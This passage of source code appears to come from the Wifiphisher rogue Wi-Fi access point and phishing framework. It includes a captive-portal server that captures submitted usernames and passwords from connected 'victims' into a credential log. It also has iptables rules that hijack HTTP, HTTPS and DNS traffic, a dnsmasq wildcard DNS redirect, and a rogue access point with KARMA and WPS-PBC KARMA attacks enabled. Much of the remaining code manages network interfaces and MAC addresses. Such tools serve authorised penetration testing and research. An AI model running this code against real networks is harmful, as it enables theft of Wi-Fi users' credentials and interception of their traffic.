else: render_file = "index.html" # load the file file_path = template_directory + render_file self.render(file_path, **template.get_context()) log_file_path = "/tmp/wifiphisher-webserver.tmp" with open(log_file_path, "a+") as log_file: log_file.write("GET request from {0} for {1}\n".format( self.request.remote_ip, self.request.full_url())) # record the GET request in the logging file logger.info("GET request from %s for %s", self.request.remote_ip, self.request.full_url()) # Find the victim object that corresponds to the ip address # And try to Discover OS by requestt victims_instance = victim.Victims.get_instance() victims_instance.associate_victim_ip_to_os( self.request.remote_ip, self.request.full_url()) def post(self): """ Override the post method :param self: A tornado.web.RequestHandler object :type self: tornado.web.RequestHandler :return: None :rtype: None ..note: we only serve the Content-Type which starts with "application/x-www-form-urlencoded" as a valid post request """ global terminate # check the http POST request header contains the Content-Type try: content_type = self.request.headers["Content-Type"] except KeyError: return try: # Check if this is a valid POST request if content_type.startswith(constants.VALID_POST_CONTENT_TYPE): post_data = tornado.escape.url_unescape(self.request.body) # log the data log_file_path = "/tmp/wifiphisher-webserver.tmp" with open(log_file_path, "a+") as log_file: log_file.write("POST request from {0} with {1}\n".format( self.request.remote_ip, post_data)) # record the post requests in the logging file logger.info("POST request from %s with %s", self.request.remote_ip, post_data) if re.search(constants.REGEX_PWD, post_data, re.IGNORECASE) or \ re.search(constants.REGEX_UNAME, post_data, re.IGNORECASE): if credential_log_path: with open(credential_log_path, 'a+') as credential_log: credential_log.write("{} {}".format( time.strftime(constants.CREDENTIALS_DATETIME_FORMAT), "POST request from {0} with {1}\n".format( self.request.remote_ip, post_data))) creds.append(post_data) terminate = True # Invalid UTF-8, drop it. except UnicodeDecodeError: pass requested_file = self.request.path[1:] template_directory = template.get_path() # choose the correct file to serve if os.path.isfile(template_directory + requested_file): render_file = requested_file else: render_file = "index.html" # load the file file_path = template_directory + render_file self.render(file_path, **template.get_context()) # Find the victim object that corresponds to the ip address # And try to Discover OS by request victims_instance = victim.Victims.get_instance() victims_instance.associate_victim_ip_to_os( self.request.remote_ip, self.request.full_url()) def runHTTPServer(ip, port, ssl_port, t, em): global template template = t # Get all the UI funcs and set them to uimethods module for f in em.get_ui_funcs(): setattr(uimethods, f.__name__, f) app = tornado.web.Application( [ (r"/backend/.*", BackendHandler, { "em": em }), (r"/.*", CaptivePortalHandler), ], template_path=template.get_path(), static_path=template.get_path_static(), compiled_template_cache=False, ui_methods=uimethods) app.listen(port, address=ip) ssl_app = tornado.web.Application([(r"/.*", DowngradeToHTTP)], port=port) https_server = tornado.httpserver.HTTPServer( ssl_app, ssl_options={ "certfile": constants.PEM, "keyfile": constants.PEM, }) https_server.listen(ssl_port, address=ip) tornado.ioloop.IOLoop.instance().start() File: wifiphisher/common/interfaces.py # -*- coding: utf-8 -*- """ This module was made to handle all the interface related operations of the program """ import logging import random from collections import defaultdict from subprocess import PIPE, Popen, check_output import pyric import pyric.pyw as pyw import wifiphisher.common.constants as constants logger = logging.getLogger("wifiphisher.interfaces") class InvalidInterfaceError(Exception): """ Exception class to raise in case of a invalid interface """ def __init__(self, interface_name, mode=None): """ Construct the class :param self: A InvalidInterfaceError object :param interface_name: Name of an interface :type self: InvalidInterfaceError :type interface_name: str :return: None :rtype: None """ message = "The provided interface \"{0}\" is invalid!".format( interface_name) # provide more information if mode is given if mode: message += "Interface {0} doesn't support {1} mode".format( interface_name, mode) Exception.__init__(self, message) class InvalidMacAddressError(Exception): """ Exception class to raise in case of specifying invalid mac address """ def __init__(self, mac_address): """ Construct the class :param self: A InvalidMacAddressError object :param mac_address: A MAC address :type self: InvalidMacAddressError :type mac_address: str :return: None :rtype: None """ message = "The MAC address could not be set. (Tried {0})".format(mac_address) Exception.__init__(self, message) class InvalidValueError(Exception): """ Exception class to raise in case of a invalid value is supplied """ def __init__(self, value, correct_value_type): """ Construct the class :param self: A InvalidValueError object :param value_type: The value supplied :param correct_value_type: The correct value type :type self: InvalidValueError :type value_type: any :type correct_value_type: any :return: None :rtype: None """ value_type = type(value) message = ("Expected value type to be {0} while got {1}.".format( correct_value_type, value_type)) Exception.__init__(self, message) class InterfaceCantBeFoundError(Exception): """ Exception class to raise in case of a invalid value is supplied """ def __init__(self, interface_modes): """ Construct the class :param self: A InterfaceCantBeFoundError object :param interface_modes: Modes of interface required :type self: InterfaceCantBeFoundError :type interface_modes: tuple :return: None :rtype: None .. note: For interface_modes the tuple should contain monitor mode as first argument followed by AP mode """ monitor_mode = interface_modes[0] ap_mode = interface_modes[1] message = "Failed to find an interface with " # add appropriate mode if monitor_mode: message += "monitor" elif ap_mode: message += "AP" message += " mode" Exception.__init__(self, message) class InterfaceManagedByNetworkManagerError(Exception): """ Exception class to raise in case of NetworkManager controls the AP or deauth interface """ def __init__(self, interface_name): """ Construct the class. :param self: An InterfaceManagedByNetworkManagerError object :param interface_name: Name of interface :type self: InterfaceManagedByNetworkManagerError :type interface_name: str :return: None :rtype: None """ message = ( "Interface \"{0}\" is controlled by NetworkManager." "You need to manually set the devices that should be ignored by NetworkManager " "using the keyfile plugin (unmanaged-directive). For example, '[keyfile] " "unmanaged-devices=interface-name:\"{0}\"' needs to be added in your " "NetworkManager configuration file.".format(interface_name)) Exception.__init__(self, message) class NetworkAdapter(object): """ This class represents a network interface """ def __init__(self, name, card_obj, mac_address): """ Setup the class with all the given arguments :param self: A NetworkAdapter object :param name: Name of the interface :param card_obj: A pyric.pyw.Card object :param mac_address: The MAC address of interface :type self: NetworkAdapter :type name: str :type card_obj: pyric.pyw.Card :type mac_address: str :return: None :rtype: None """ # Setup the fields self._name = name self._has_ap_mode = False self._has_monitor_mode = False self._is_managed_by_nm = False self._card = card_obj self._original_mac_address = mac_address self._current_mac_address = mac_address @property def name(self): """ Return the name of the interface :param self: A NetworkAdapter object :type self: NetworkAdapter :return: The name of the interface :rtype: str """ return self._name @property def is_managed_by_nm(self): """ Return whether the interface controlled by NetworkManager :param self: A NetworkAdapter object :type self: NetworkAdapter :return: True if interface is controlled by NetworkManager :rtype: bool """ return self._is_managed_by_nm @is_managed_by_nm.setter def is_managed_by_nm(self, value): """ Set whether the interface is controlled by NetworkManager :param self: A NetworkAdapter object :param value: A value representing interface controlled by NetworkManager :type self: NetworkAdapter :type value: bool :return: None :rtype: None :raises InvalidValueError: When the given value is not bool """ if isinstance(value, bool): self._is_managed_by_nm = value else: raise InvalidValueError(value, bool) @property def has_ap_mode(self): """ Return whether the interface supports AP mode :param self: A NetworkAdapter object :type self: NetworkAdapter :return: True if interface supports AP mode and False otherwise :rtype: bool """ return self._has_ap_mode @has_ap_mode.setter def has_ap_mode(self, value): """ Set whether the interface supports AP mode :param self: A NetworkAdapter object :param value: A value representing AP mode support :type self: NetworkAdapter :type value: bool :return: None :rtype: None :raises InvalidValueError: When the given value is not bool """ if isinstance(value, bool): self._has_ap_mode = value else: raise InvalidValueError(value, bool) @property def has_monitor_mode(self): """ Return whether the interface supports monitor mode :param self: A NetworkAdapter object :type self: NetworkAdapter :return: True if interface supports monitor mode and False otherwise :rtype: bool """ return self._has_monitor_mode @has_monitor_mode.setter def has_monitor_mode(self, value): """ Set whether the interface supports monitor mode :param self: A NetworkAdapter object :param value: A value representing monitor mode support :type self: NetworkAdapter :type value: bool :return: None :rtype: None :raises InvalidValueError: When the given value is not bool """ if isinstance(value, bool): self._has_monitor_mode = value else: raise InvalidValueError(value, bool) @property def card(self): """ Return the card object associated with the interface :param self: A NetworkAdapter object :type self: NetworkAdapter :return: The card object :rtype: pyric.pyw.Card """ return self._card @property def mac_address(self): """ Return the current MAC address of the interface :param self: A NetworkAdapter object :type self: NetworkAdapter :return: The MAC of the interface :rtype: str """ return self._current_mac_address @mac_address.setter def mac_address(self, value): """ Set the MAC address of the interface :param self: A NetworkAdapter object :param value: A value representing monitor mode support :type self: NetworkAdapter :type value: str :return: None :rtype: None """ self._current_mac_address = value @property def original_mac_address(self): """ Return the original MAC address of the interface :param self: A NetworkAdapter object :type self: NetworkAdapter :return: The original MAC of the interface :rtype: str """ return self._original_mac_address class NetworkManager(object): """ This class represents a network manager where it handles all the management for the interfaces. """ def __init__(self): """ Setup the class with all the given arguments. :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None """ self._name_to_object = dict() self._active = set() self._exclude_shutdown = set() self._internet_access_enable = False self._vifs_add = set() @property def internet_access_enable(self): """ Return whether an interface will be used to provide Internet access :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None """ return self._internet_access_enable @internet_access_enable.setter def internet_access_enable(self, value): """ Set the internet access :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None """ if isinstance(value, bool): self._internet_access_enable = value else: raise InvalidValueError(value, bool) def nm_unmanage(self, interface): """ Set an interface to unmanaged. :param interface: Name of the interface :type interface: str :return: True upon success :rtype: bool """ try: proc = Popen(['nmcli', 'dev', 'set', interface, 'manage', 'no'], stderr=PIPE) err = proc.communicate()[1] except: logger.error("Failed to make NetworkManager unmanage interface {0}: {1}".format(interface, err)) raise InterfaceManagedByNetworkManagerError(interface) # Ensure that the interface is unmanaged if is_managed_by_network_manager(interface): raise InterfaceManagedByNetworkManagerError(interface) def is_interface_valid(self, interface_name, mode=None): """ Check if interface is valid :param self: A NetworkManager object :param interface_name: Name of an interface :param mode: The mode of the interface to be checked :type self: NetworkManager :type interface_name: str :type mode: str :return: True if interface is valid :rtype: bool :raises InvalidInterfaceError: If the interface is invalid or the interface has been chosen in the set _active :raises InterfaceManagedByNetworkManagerError: If the card is managed and is being used as deauth/ap mode .. note: The available modes are monitor, AP, WPS and internet The internet adapter should be put in the _exclude_shutdown set so that it will not be shutdown after the program exits. """ try: interface_adapter = self._name_to_object[interface_name] except KeyError: # if mode is internet and not wireless card bypass the check if mode == "internet": return True else: raise InvalidInterfaceError(interface_name) # add to _exclude_shutdown set if the card is internet adapter if mode == "internet" or mode == "WPS": self._exclude_shutdown.add(interface_name) # raise an error if interface doesn't support the mode if mode != "internet" and interface_adapter.is_managed_by_nm\ and self.internet_access_enable: self.nm_unmanage(interface_name) if mode == "monitor" and not interface_adapter.has_monitor_mode: raise InvalidInterfaceError(interface_name, mode) elif mode == "AP" and not interface_adapter.has_ap_mode: raise InvalidInterfaceError(interface_name, mode) # raise an error if interface is already in the _active set if interface_name in self._active: raise InvalidInterfaceError(interface_name) self._active.add(interface_name) return True def up_interface(self, interface_name): """ Equivalent to ifconfig interface_name up :param self: A NetworkManager object :param interface_name: Name of an interface :type self: NetworkManager :type interface_name: str :return: None :rtype: None ..note: Let the pywifiphisher decide when to up the interface since some cards cannot up two virtual interface with managed mode in the same time. """ card = self._name_to_object[interface_name].card pyw.up(card) def down_interface(self, interface_name): """ Equivalent to ifconfig interface_name down :param self: A NetworkManager object :param interface_name: Name of an interface :type self: NetworkManager :type interface_name: str :return: None :rtype: None """ card = self._name_to_object[interface_name].card pyw.down(card) def set_interface_mac(self, interface_name, mac_address=None): """ Set the specified MAC address for the interface :param self: A NetworkManager object :param interface_name: Name of an interface :param mac_address: A MAC address :type self: NetworkManager :type interface_name: str :type mac_address: str :return: new MAC :rtype: str .. note: This method will set the interface to managed mode """ if not mac_address: mac_address = generate_random_address() self._name_to_object[interface_name].mac_address = mac_address card = self._name_to_object[interface_name].card self.set_interface_mode(interface_name, "managed") self.down_interface(interface_name) # card must be turned off(down) before setting mac address try: pyw.macset(card, mac_address) # make sure to catch an invalid mac address except pyric.error as error: raise InvalidMacAddressError(mac_address) return mac_address def get_interface_mac(self, interface_name): """ Return the MAC address of the interface :param self: A NetworkManager object :param interface_name: Name of an interface :type self: NetworkManager :type interface_name: str :return: Interface MAC address :rtype: str """ return self._name_to_object[interface_name].mac_address def set_interface_mode(self, interface_name, mode): """ Set the specified mode for the interface :param self: A NetworkManager object :param interface_name: Name of an interface :param mode: Mode of an interface :type self: NetworkManager :type interface_name: str :type mode: str :return: None :rtype: None .. note: Available modes are unspecified, ibss, managed, AP AP VLAN, wds, monitor, mesh, p2p Only set the mode when card is in the down state """ card = self._name_to_object[interface_name].card self.down_interface(interface_name) # set interface mode between brining it down and up pyw.modeset(card, mode) def get_interface(self, has_ap_mode=False, has_monitor_mode=False): """ Return the name of a valid interface with modes supplied :param self: A NetworkManager object :param has_ap_mode: AP mode support :param has_monitor_mode: Monitor mode support :type self: NetworkManager :type has_ap_mode: bool :type has_monitor_mode: bool :return: Name of valid interface :rtype: str .. raises InterfaceCantBeFoundError: When an interface with supplied modes can't be found .. raises InterfaceManagedByNetworkManagerError: When the chosen interface is managed by NetworkManager .. note: This method guarantees that an interface with perfect match will be returned if available """ possible_adapters = list() for interface, adapter in list(self._name_to_object.items()): # check to make sure interface is not active and not already in the possible list if (interface not in self._active) and ( adapter not in possible_adapters): # in case of perfect match case if (adapter.has_ap_mode == has_ap_mode and adapter.has_monitor_mode == has_monitor_mode): possible_adapters.insert(0, adapter) # in case of requested AP mode and interface has AP mode (Partial match) elif has_ap_mode and adapter.has_ap_mode: possible_adapters.append(adapter) # in case of requested monitor mode and interface has monitor mode (Partial match) elif has_monitor_mode and adapter.has_monitor_mode: possible_adapters.append(adapter) # From all possible interface candidates, # give priority to those we may have created our_vifs = [] for wlan in self._vifs_add: for adapter in possible_adapters: if wlan.dev == adapter.name: our_vifs.append(adapter) for adapter in our_vifs + possible_adapters: if ((not adapter.is_managed_by_nm and self.internet_access_enable) or (not self.internet_access_enable)): chosen_interface = adapter.name self._active.add(chosen_interface) return chosen_interface if possible_adapters: raise InterfaceManagedByNetworkManagerError("ALL") else: raise InterfaceCantBeFoundError((has_monitor_mode, has_ap_mode)) def get_interface_automatically(self): """ Returns a tuple of two interfaces :param self: A NetworkManager object :param self: NetworkManager :return: Name of monitor interface followed by AP interface :rtype: tuple """ monitor_interface = self.get_interface(has_monitor_mode=True) ap_interface = self.get_interface(has_ap_mode=True) return (monitor_interface, ap_interface) def unblock_interface(self, interface_name): """ Unblock interface if it is blocked :param self: A NetworkManager object :param interface_name: Name of an interface :type self: NetworkManager :type interface_name: str :return: None :rtype: None """ card = self._name_to_object[interface_name].card # unblock card if it is blocked try: if pyw.isblocked(card): pyw.unblock(card) except pyric.error: pass def set_interface_channel(self, interface_name, channel): """ Set the channel for the interface :param self: A NetworkManager object :param interface_name: Name of an interface :param channel: A channel number :type self: NetworkManager :type interface_name: str :type channel: int :return: None :rtype: None """ card = self._name_to_object[interface_name].card pyw.chset(card, channel) def add_virtual_interface(self, card): """ Add the virtual interface to the host system :param self: A NetworkManager object :param card: A pyw.Card object :type self: NetworkManager :type card: pyw.Card :return name of the interface :rtype str :..note: when add the interface it is possible raising the pyric.error causing by adding the duplicated wlan interface name. """ done_flag = True number = -1 while done_flag: try: number += 1 name = 'wfphshr-wlan' + str(number) pyw.down(card) monitor_card = pyw.devadd(card, name, 'monitor') done_flag = False # catch if wlan1 is already exist except pyric.error: pass self._vifs_add.add(monitor_card) return name def remove_vifs_added(self): """ Remove all the added virtual interfaces :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None """ for card in self._vifs_add: pyw.devdel(card) def start(self, args): """ Start the network manager :param self: A NetworkManager object :type self: NetworkManager :param args: An argparse.Namespace object :type args: argparse.Namespace :return: None :rtype: None """ # populate our dictionary with all the available interfaces on the system for interface in pyw.interfaces(): try: card = pyw.getcard(interface) mac_address = pyw.macget(card) adapter = NetworkAdapter(interface, card, mac_address) self._name_to_object[interface] = adapter interface_property_detector(adapter) # ignore devices that are not supported(93) and no such device(19) except pyric.error as error: if error.args[0] in (93, 19): pass elif interface == args.internetinterface: return False else: raise error def on_exit(self): """ Perform a clean up for the class :param self: A NetworkManager object :type self: NetworkManager :return: None :rtype: None ..note: The cards in _exclude_shutdown will not set to the original mac address since these cards are not changed the mac addresses by the program. """ for interface in self._active: if interface not in self._exclude_shutdown: adapter = self._name_to_object[interface] mac_address = adapter.original_mac_address self.set_interface_mac(interface, mac_address) # remove all the virtual added virtual interfaces self.remove_vifs_added() def is_add_vif_required(main_interface, internet_interface, wpspbc_assoc_interface): """ Return the card if only that card support both monitor and ap :param args: Arguemnt from pywifiphisher :type args: parse.args :return: tuple of card and is_frequency_hop_allowed :rtype: tuple """ def get_perfect_card(phy_map_vifs, vif_score_tups): """ Get the perfect card that both supports ap and monitor when we have only one phy interface can do that :param phy_map_vifs: phy number maps to the virtual interfaces :param vif_score_tups: list of tuple containing card and score :type phy_map_vifs: dict :type vif_score_tups: list :return tuple of card and single_perfect_phy_case :rtype: tuple """ # case 1 : one phy maps to one virtual interface if len(phy_map_vifs) == 1 and len(list(phy_map_vifs.values())[0]) == 1: # only take the first tuple vif_score_tuple = vif_score_tups[0] card = vif_score_tuple[0] score = vif_score_tuple[1] # if this card support both monitor and AP mode if score == 2: return card, True # case 2 : one phy maps to multiple virtual interfaces # we don't need to create one more virtual interface in this case elif len(phy_map_vifs) == 1 and len(list(phy_map_vifs.values())[0]) > 1: return None, True # case 3 : we have multiple phy interfaces but only # one card support both monitor and AP and the other # ones just support the managed mode only elif len(phy_map_vifs) > 1: if vif_score_tups[0][1] == 2 and vif_score_tups[1][1] == 0: return vif_score_tups[0][0], True return None, False # map the phy interface to virtual interfaces # i.e. phy0 to wlan0 phy_to_vifs = defaultdict(list) # map the phy# to the virtual interface tuples for vif in [vif for vif in pyw.interfaces() if pyw.iswireless(vif)]: # excluding the card that used for internet accessing # setup basic card information score = 0 if vif == internet_interface or vif == wpspbc_assoc_interface: continue else: card = pyw.getcard(vif) phy_number = card.phy supported_modes = pyw.devmodes(card) if "monitor" in supported_modes: score += 1 if "AP" in supported_modes: score += 1 phy_to_vifs[phy_number].append((card, score)) # each phy number map to a sublist containing (card, score) vif_score_tuples = [sublist[0] for sublist in list(phy_to_vifs.values())] # sort with score vif_score_tuples = sorted(vif_score_tuples, key=lambda tup: -tup[1]) use_one_phy = False # check the user-provided args.interface if main_interface: card = pyw.getcard(main_interface) phy_number = card.phy if phy_to_vifs[card.phy][0][1] == 2: perfect_card = card use_one_phy = True else: raise InvalidInterfaceError(main_interface) else: perfect_card, use_one_phy = get_perfect_card( phy_to_vifs, vif_score_tuples) return perfect_card, use_one_phy def is_managed_by_network_manager(interface_name): """ Check if the interface is managed by NetworkManager At this point NetworkManager may or may not be running. If it's not running, nothing is returned. :param interface_name: An interface name :type interface_name: str :return if managed by NetworkManager return True :rtype: bool """ is_managed = False try: nmcli_process = Popen(['/bin/sh', '-c', 'export LC_ALL=C; nmcli dev; unset LC_ALL'], stdout=constants.DN, stderr=PIPE) out, err = nmcli_process.communicate() if err == None and out != "": for l in out.splitlines(): #TODO: If the device is managed and user has nmcli installed, # we can probably do a "nmcli dev set wlan0 managed no" if interface_name in l: if "unmanaged" not in l: is_managed = True else: # Ignore until we make handle logging registers properly. pass #logger.error("Failed to make NetworkManager ignore interface %s", interface_name) else: # Ignore until we make handle logging registers properly. pass #logger.error("Failed to check if interface %s is managed by NetworkManager", interface_name) nmcli_process.stdout.close(); # NetworkManager service is not running so the devices must be unmanaged # (CalledProcessError) # Or nmcli is not installed... except: pass return bool(is_managed) def interface_property_detector(network_adapter): """ Add appropriate properties of the interface such as supported modes and wireless type(wireless) :param network_adapter: A NetworkAdapter object :type interface_name: NetworkAdapter :return: None :rtype: None """ supported_modes = pyw.devmodes(network_adapter.card) # check for monitor, AP and wireless mode support if "monitor" in supported_modes: network_adapter.has_monitor_mode = True if "AP" in supported_modes: network_adapter.has_ap_mode = True interface_name = network_adapter.name network_adapter.is_managed_by_nm = is_managed_by_network_manager( interface_name) def is_wireless_interface(interface_name): """ Check if the interface is wireless interface :param interface_name: Name of an interface :type interface_name: str :return: True if the interface is wireless interface :rtype: bool """ if pyw.iswireless(interface_name): return True return False def generate_random_address(): """ Make and return the randomized MAC address :return: A MAC address :rtype str .. warning: The first 3 octets are 00:00:00 by default """ mac_address = constants.DEFAULT_OUI + ":{:02x}:{:02x}:{:02x}".format( random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)) return mac_address def does_have_mode(interface, mode): """ Return whether the provided interface has the mode :param interface: Name of the interface :param mode: Mode of operation :type interface: str :type mode: str :return: True if interface has the mode and False otherwise :rtype: bool :Example: >>> does_have_mode("wlan0", "AP") True >>> does_have_mode("wlan1", "monitor") False """ card = pyric.pyw.getcard(interface) return mode in pyric.pyw.devmodes(card) File: wifiphisher/common/firewall.py """Serves as an abstraction layer in front of iptables.""" from __future__ import (absolute_import, division, print_function, unicode_literals) from wifiphisher.common.constants import NETWORK_GW_IP, PORT, SSL_PORT from wifiphisher.common.utilities import execute_commands class Fw(): """Handles all iptables operations.""" @staticmethod def nat(internal_interface, external_interface): # type: (str, str) -> None """Do NAT.""" execute_commands([ "iptables -t nat -A POSTROUTING -o {} -j MASQUERADE".format( external_interface), "iptables -A FORWARD -i {} -o {} -j ACCEPT".format( internal_interface, external_interface) ]) @staticmethod def clear_rules(): # type: () -> None """Clear all rules.""" execute_commands([ "iptables -F", "iptables -X", "iptables -t nat -F", "iptables -t nat -X" ]) @staticmethod def redirect_requests_localhost(): # type: () -> None """Redirect HTTP, HTTPS & DNS requests to localhost. Redirect the following requests to localhost: * HTTP (Port 80) * HTTPS (Port 443) * DNS (Port 53) """ execute_commands([ "iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT " "--to-destination {}:{}".format(NETWORK_GW_IP, PORT), "iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT " "--to-destination {}:{}".format(NETWORK_GW_IP, 53), "iptables -t nat -A PREROUTING -p tcp --dport 53 -j DNAT " "--to-destination {}:{}".format(NETWORK_GW_IP, 53), "iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT " "--to-destination {}:{}".format(NETWORK_GW_IP, SSL_PORT) ]) def on_exit(self): # type: () -> None """Start the clean up.""" self.clear_rules() File: wifiphisher/common/accesspoint.py """This module was made to fork the rogue access point.""" from __future__ import (absolute_import, division, print_function, unicode_literals) import os import subprocess import time from subprocess import check_output import roguehostapd.apctrl as apctrl import roguehostapd.config.hostapdconfig as hostapdconfig import wifiphisher.common.constants as constants import wifiphisher.common.victim as victim class AccessPoint(object): """This class forks the softAP.""" # Instance will be stored here. __instance = None @staticmethod def get_instance(): """Return the instance of the class or create new if none exists.""" if AccessPoint.__instance is None: AccessPoint() return AccessPoint.__instance def __init__(self): # type: () -> None """Initialize the class.""" if AccessPoint.__instance: raise Exception("Error: AccessPoint class is a singleton!") else: AccessPoint.__instance = self self.interface = "" self.internet_interface = "" self.channel = "" self.essid = "" self.presharedkey = "" self.force_hostapd = False # roguehostapd object self.hostapd_object = None self.deny_mac_addrs = [] self.dns_conf_path = constants.DNS_CONF_PATH def start_dhcp_dns(self): # type: () -> None """Start the dhcp server.""" config = ('no-resolv\n' 'interface=%s\n' 'dhcp-range=%s\n') with open(self.dns_conf_path, 'w') as dhcpconf: dhcpconf.write(config % (self.interface, constants.DHCP_LEASE)) with open(self.dns_conf_path, 'a+') as dhcpconf: if self.internet_interface: dhcpconf.write("server=%s" % (constants.PUBLIC_DNS, )) else: dhcpconf.write("address=/google.com/172.217.5.78\n") dhcpconf.write("address=/clients3.google.com/172.217.11.174\n") dhcpconf.write("address=/#/%s " % (constants.NETWORK_GW_IP, )) # catch the exception if dnsmasq is not installed try: subprocess.Popen( ['dnsmasq', '-C', self.dns_conf_path], stdout=subprocess.PIPE, stderr=constants.DN) except OSError: print("[{}!{}] dnsmasq is not installed!".format( constants.R, constants.W)) raise Exception subprocess.Popen( ['ifconfig', str(self.interface), 'mtu', '1400'], stdout=constants.DN, stderr=constants.DN) subprocess.Popen( [ 'ifconfig', str(self.interface), 'up', constants.NETWORK_GW_IP, 'netmask', constants.NETWORK_MASK ], stdout=constants.DN, stderr=constants.DN) # Give it some time to avoid "SIOCADDRT: Network is unreachable" time.sleep(1) # Make sure that we have set the network properly. proc = subprocess.check_output(['ifconfig', str(self.interface)]) if constants.NETWORK_GW_IP not in proc.decode('utf-8'): return False subprocess.call(('route add -net %s netmask %s gw %s' % (constants.NETWORK_IP, constants.NETWORK_MASK, constants.NETWORK_GW_IP)), shell=True) def start(self, disable_karma=False): """Start the softAP.""" # create the configuration for roguehostapd hostapd_config = { "ssid": self.essid, "interface": self.interface, "channel": self.channel, "deny_macs": self.deny_mac_addrs, } if self.presharedkey: hostapd_config['wpa2password'] = self.presharedkey self.hostapd_object = apctrl.Hostapd() if not self.force_hostapd: try: # Enable KARMA attack if needed if not disable_karma: hostapd_config["karma_enable"] = 1 # Enable WPSPBC KARMA attack hostapd_config["wpspbc"] = True hostapd_options = { 'mute': True, 'timestamp': False, "eloop_term_disable": True } self.hostapd_object.start(hostapd_config, hostapd_options) except KeyboardInterrupt: raise Exception except BaseException: print( "[{}!{}] Roguehostapd is not installed in the system! Please install" " roguehostapd manually (https://github.com/wifiphisher/roguehostapd)" " and rerun the script. Otherwise, you can run the tool with the" " --force-hostapd option to use hostapd but please note that using" " Wifiphisher with hostapd instead of roguehostapd will turn off many" " significant features of the tool.".format( constants.R, constants.W)) # just raise exception when hostapd is not installed raise Exception else: # use the hostapd on the users' system self.hostapd_object.create_hostapd_conf_file(hostapd_config, {}) try: self.hostapd_object = subprocess.Popen( ['hostapd', hostapdconfig.ROGUEHOSTAPD_RUNTIME_CONFIGPATH], stdout=constants.DN, stderr=constants.DN) except OSError: print( "[{}!{}] hostapd is not installed in the system! Please download it" " using your favorite package manager (e.g. apt-get install hostapd) and " "rerun the script.".format(constants.R, constants.W)) # just raise exception when hostapd is not installed raise Exception time.sleep(2) if self.hostapd_object.poll() is not None: print("[{}!{}] hostapd failed to lunch!".format( constants.R, constants.W)) raise Exception def on_exit(self): # type: () -> None """Clean up the resoures when exits.""" subprocess.call('pkill dnsmasq', shell=True) try: self.hostapd_object.stop() except BaseException: subprocess.call('pkill hostapd', shell=True) if os.path.isfile(hostapdconfig.ROGUEHOSTAPD_RUNTIME_CONFIGPATH): os.remove(hostapdconfig.ROGUEHOSTAPD_RUNTIME_CONFIGPATH) if os.path.isfile(hostapdconfig.ROGUEHOSTAPD_DENY_MACS_CONFIGPATH): os.remove(hostapdconfig.ROGUEHOSTAPD_DENY_MACS_CONFIGPATH) if os.path.isfile('/var/lib/misc/dnsmasq.leases'): os.remove('/var/lib/misc/dnsmasq.leases') if os.path.isfile('/tmp/dhcpd.conf'): os.remove('/tmp/dhcpd.conf') # sleep 2 seconds to wait all the hostapd process is # killed time.sleep(2) def read_connected_victims_file(self): """Update the Victims dictionary by reading dnsmasq.leases file.""" if (not os.path.isfile('/var/lib/misc/dnsmasq.leases')): return with open("/var/lib/misc/dnsmasq.leases", "r") as dnsmasq_leases: for line in dnsmasq_leases: line = line.split() if not line: return mac_address = line[1].strip() ip_address = line[2].strip() # Get instance of victims dic victims_instance = victim.Victims.get_instance() if mac_address in victims_instance.victims_dic: existing_victim = victims_instance.victims_dic[mac_address] if ip_address == existing_victim.ip_address: return existing_victim.assign_ip_to_victim(mac_address, ip_address) else: new_victim = victim.Victim(mac_address, ip_address) victims_instance.add_to_victim_dic(new_victim) new_victim.associate_victim_mac_to_vendor(mac_address) File: wifiphisher/common/uimethods.py import importlib from functools import wraps import wifiphisher.common.constants def uimethod(func): def _decorator(data, *args, **kwargs): response = func(data, *args, **kwargs) return response func.is_uimethod = True return wraps(func)(_decorator) File: wifiphisher/common/globals.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # pylint: skip-file ALL_2G_CHANNELS = list(range(1, 14)) File: wifiphisher/common/macmatcher.py """ This module was made to match MAC address with vendors """ import wifiphisher.common.constants as constants class MACMatcher(object): """ This class handles Organizationally Unique Identifiers (OUIs). The original data comes from http://standards.ieee.org/regauth/ oui/oui.tx .. seealso:: http://standards.ieee.org/faqs/OUI.html """ def __init__(self, mac_vendor_file): """ Setup the class with all the given arguments :param self: A MACMatcher object :param mac_vendor_file: The path of the vendor file :type self: MACMatcher :type mac_vendor_file: string :return: None :rtype: None """ self._mac_to_vendor = {} self._vendor_file = mac_vendor_file # get the information in the vendor file self._get_vendor_information() def _get_vendor_information(self): """ Read and process all the data in the vendor file :param self: A MACMatcher object :type self: MACMatcher :return: None :rtype: None """ # open the file with all the MAC addresses and # vendor information with open(self._vendor_file, 'r') as _file: # check every line in the file for line in _file: # skip comment lines if not line.startswith("#"): # separate vendor and MAC addresses and add it # to the dictionary separated_line = line.rstrip('\n').split('|') mac_identifier = separated_line[0] vendor = separated_line[1] logo = separated_line[2] self._mac_to_vendor[mac_identifier] = (vendor, logo) def get_vendor_name(self, mac_address): """ Return the matched vendor name for the given MAC address or Unknown if no match is found :param self: A MACMatcher object :param mac_address: MAC address of device :type self: MACMatcher :type mac_address: string :return: The vendor name of the device if MAC address is found and Unknown otherwise :rtype: string """ # Don't bother if there's no MAC if mac_address is None: return None # convert mac address to same format as file # ex. 12:34:56:78:90:AB --> 123456 mac_identifier = mac_address.replace(':', '').upper()[0:6] # try to find the vendor and if not found return unknown try: vendor = self._mac_to_vendor[mac_identifier][0] return vendor except KeyError: return "Unknown" def get_vendor_logo_path(self, mac_address): """ Return the the full path of the logo in the filesystem for the given MAC address or None if no match is found :param self: A MACMatcher object :param mac_address: MAC address of the device :type self: MACMatcher :type mac_address: string :return: The full path of the logo if MAC address if found and None otherwise :rtype: string or None """ # Don't bother if there's no MAC if mac_address is None: return None # convert mac address to same format as file # ex. 12:34:56:78:90:AB --> 123456 mac_identifier = mac_address.replace(':', '').upper()[0:6] # check to see if vendor is available for the MAC address if mac_identifier in self._mac_to_vendor: # find the logo and it's path logo = self._mac_to_vendor[mac_identifier][1] logo_path = constants.LOGOS_DIR + logo # return logo name if it was provided otherwise return None if logo: return logo_path else: return None def unbind(self): """ Unloads mac to vendor mapping from memory and therefore you can not use MACMatcher instance once this method is called :param self: A MACMatcher object :type self: MACMatcher :return: None :rtype: None """ del self._mac_to_vendor File: 